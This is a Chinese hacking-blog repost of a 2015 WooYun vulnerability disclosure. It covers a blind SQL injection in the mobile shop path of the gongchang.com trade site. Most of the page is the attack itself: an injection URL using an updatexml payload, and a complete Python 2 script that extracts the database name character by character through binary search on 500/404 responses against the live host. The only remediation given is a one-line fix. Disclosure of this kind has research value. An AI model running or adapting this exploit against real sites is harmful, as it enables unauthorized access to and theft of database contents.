记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

世界工厂网一处特别隐蔽的SQL注入漏洞(附脚本)

2015-04-22 12:05

http://m.gongchang.com/shop/syg'or(updatexml(1,if(1=1,1,0x22),1))or'/





1=1返回404

1=2返回500



判断存在注入



验证脚本

code 区域
#coding=utf-8



import sys,urllib2



from optparse import OptionParser



from urllib2 import Request,urlopen,URLError,HTTPError



import urllib

result=''









def request(URL):



#print URL



user_agent = { 'User-Agent' : 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/534.55.3 (KHTML, like Gecko) Version/5.1.3 Safari/534.53.10' }



req = urllib2.Request(URL, None, user_agent)







try:



request = urllib2.urlopen(req)







except HTTPError, e:



if e.code == 500:



return '500Runtime Error'





if e.code == 404:



return '404Runtime Error'











except URLError, e:



#print('[!] We failed to reach a server.')



#print('[!] Reason: ' + str(e.reason))



sys.exit(1)







return request.read()











def binary_sqli(left, right, index):



global result



while 1:



mid = (left + right)/2



if mid == left:



result += chr(mid)



print 'db: ' ,result



break



payload = "'or(updatexml(1,if(mid(database(),%s,1)>%s,1,0x22),1))or'/" % (index, hex(mid))



#param = {'pid': payload}



html = request('http://m.gongchang.com/m/shop/syg'+payload)



print ('http://m.gongchang.com/m/shop/syg'+payload)



verify = '500'



if verify in html:



right = mid



else:



left = mid









if __name__ == '__main__':



for i in range(1,32):



binary_sqli(32, 127, i)

漏洞证明:

获取数据库用户:

1.jpg





获取数据名:

2.jpg

修复方案:

参数严格过滤

知识来源: www.wooyun.org/bugs/wooyun-2015-0109265

阅读:87482 | 评论:0 | 标签:注入 漏洞

想收藏或者和大家分享这篇好文章→复制链接地址

“世界工厂网一处特别隐蔽的SQL注入漏洞(附脚本)”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云